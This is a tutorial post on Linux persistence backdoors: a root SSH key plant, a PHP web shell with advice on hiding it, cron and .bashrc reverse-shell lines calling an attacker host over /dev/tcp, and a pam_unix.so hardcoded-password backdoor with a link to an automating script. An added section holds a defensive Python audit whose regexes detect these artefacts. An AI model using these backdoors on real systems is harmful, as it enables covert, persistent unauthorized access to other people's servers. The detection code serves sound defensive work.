Linux Backdoors: all the different techniques
SSH Backdoors
SSH backdoors work by planting our own SSH key on the target, the kind of key-based login some people prefer for everyday use.
Here the target user is root, the user with the highest privileges.
Let's generate an SSH key pair with ssh-keygen.
We now have two files: a private key and a public key. Copy the public key into /root/.ssh.
Rename the public key to authorized_keys so it ends up as /root/.ssh/authorized_keys.
Now log in as root with the private key.
Note: this backdoor is not really hidden. The administrator will notice the extra key.
PHP Backdoors
A Linux web server has a web root, and any PHP file placed in it is served and executed by the web server.
The web root is usually located at /var/www/html.
Code:
<?php
// Runs the value of the "cmd" request parameter as a shell command and
// prints the output; this is the web shell described in the text.
if (isset($_REQUEST['cmd'])) {
    echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
This piece of code takes the "cmd" parameter and runs whatever is passed in it as a shell command.
Notice the "$_REQUEST['cmd']": it means you can pass this parameter in either GET or POST data.
A few suggestions for hiding it:
You can add the code to an existing PHP file instead of creating a new one.
Use a different, less obvious name than "cmd" for the parameter.
CronJob Backdoors
What is a cronjob?
It is a job scheduler used on Unix-like systems. Cron is used to run programs at fixed times, dates or intervals, i.e. to schedule work.
Look at the cron files in /etc (for example /etc/crontab).
Notice the two letters "m" and "h" in the header.
These columns stand for minute and hour and determine when the task runs.
You can see a "*" under "h". This means the task runs every hour, at the minute given in the "m" column.
Add this line to the crontab:
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/port 0>&1'
Don't forget to listen on the port you specified.
Note: this backdoor is not really hidden either. The administrator will notice the crontab entry.
.bashrc Backdoors
Whenever Bash is started as an interactive shell, the ".bashrc" file in the user's home directory is executed.
To append the backdoor to a user's ".bashrc" file, run this command:
echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc
Your nc listener should always be ready for the moment the user opens a shell.
Note: this backdoor can be considered hidden, since it sits in a file the administrator rarely inspects.
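As an added defender-side example (not part of the original post), this small Python audit looks for the artefacts the four techniques above leave behind: reverse-shell lines in a crontab or .bashrc, PHP files that pass request parameters straight into shell_exec and friends, and authorized_keys entries missing from an approved inventory. All sample data (IP address, key blobs, file names) is constructed.

```python
import re

# Constructed sample artefacts standing in for what a defender reads from a
# host: a system crontab, a user's ~/.bashrc, PHP files under the web root
# and root's authorized_keys. The IP and key blobs are made-up placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'
"""
SAMPLE_BASHRC = "alias ll='ls -alF'\nbash -i >& /dev/tcp/198.51.100.7/4444 0>&1\n"
SAMPLE_PHP = {
    "index.php": "<?php echo 'hello'; ?>",
    "inc/cache.php": '<?php if(isset($_REQUEST["x"])){echo shell_exec($_REQUEST["x"]);} ?>',
}
SAMPLE_AUTHORIZED_KEYS = ("ssh-ed25519 AAAAC3Nza...knownAdminKey admin@laptop\n"
                          "ssh-ed25519 AAAAC3Nza...unknownKey\n")
APPROVED_KEYS = {("ssh-ed25519", "AAAAC3Nza...knownAdminKey")}

# Reverse-shell idioms used by the cron and .bashrc techniques in the post.
REVERSE_SHELL = re.compile(r"/dev/(tcp|udp)/|bash\s+-i\s*>&|\bnc\b.*\s-[ec]\b")
# PHP shell-execution sinks fed directly from a request parameter (the web shell).
PHP_SINK = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open)\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b")

def find_reverse_shells(text):
    """Return (line_no, line) for non-comment lines matching a reverse-shell idiom."""
    return [(no, line.strip()) for no, line in enumerate(text.splitlines(), 1)
            if not line.lstrip().startswith("#") and REVERSE_SHELL.search(line)]

def find_php_webshells(files):
    """Return names of PHP files that pass request data straight into a shell sink."""
    return sorted(name for name, src in files.items() if PHP_SINK.search(src))

def unexpected_keys(authorized_keys, approved):
    """Return (type, blob) pairs in authorized_keys that are not in the approved set."""
    found = []
    for line in authorized_keys.splitlines():
        fields = line.split()
        # Key options such as from="..." may precede the type; locate the type field.
        for i, f in enumerate(fields[:-1]):
            if f.startswith(("ssh-", "ecdsa-", "sk-")):
                pair = (f, fields[i + 1])
                if pair not in approved:
                    found.append(pair)
                break
    return found

if __name__ == "__main__":
    print(find_reverse_shells(SAMPLE_CRONTAB), find_reverse_shells(SAMPLE_BASHRC))
    print(find_php_webshells(SAMPLE_PHP))
    print(unexpected_keys(SAMPLE_AUTHORIZED_KEYS, APPROVED_KEYS))
```

On a real host, feed the functions the contents of /etc/crontab and /etc/cron.d/*, every user's .bashrc, the files under /var/www/html and each user's authorized_keys.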
pam_unix.so Backdoors
"pam_unix.so" is one of the files responsible for authentication in Linux.
The function "unix_verify_password" inside pam_unix.so is what verifies the user's password.
Did you see what I added?
if (strcmp(p, "0xMitsurugi") != 0)
We compare the string "0xMitsurugi" with "p" in the screenshot.
"p" refers to the password entered by the user.
You can see "!= 0" at the end of the expression: strcmp returns 0 when the strings match, so the condition is true when they differ.
So IF "p" (user controlled) and "0xMitsurugi" are NOT the same, the normal "unix_verify_password" check is used.
If the string "p" (supplied by the user) and the string "0xMitsurugi" are the same, authentication is accepted and we return "PAM_SUCCESS".
This backdoor consists of compiling your own password into the "pam_unix.so" file.
Once the modified pam_unix.so carrying your added password is installed, you can authenticate with that password until it is removed from "pam_unix.so".
There is a script that does this automatically:
GitHub - zephrax/linux-pam-backdoor: Linux PAM Backdoor (github.com)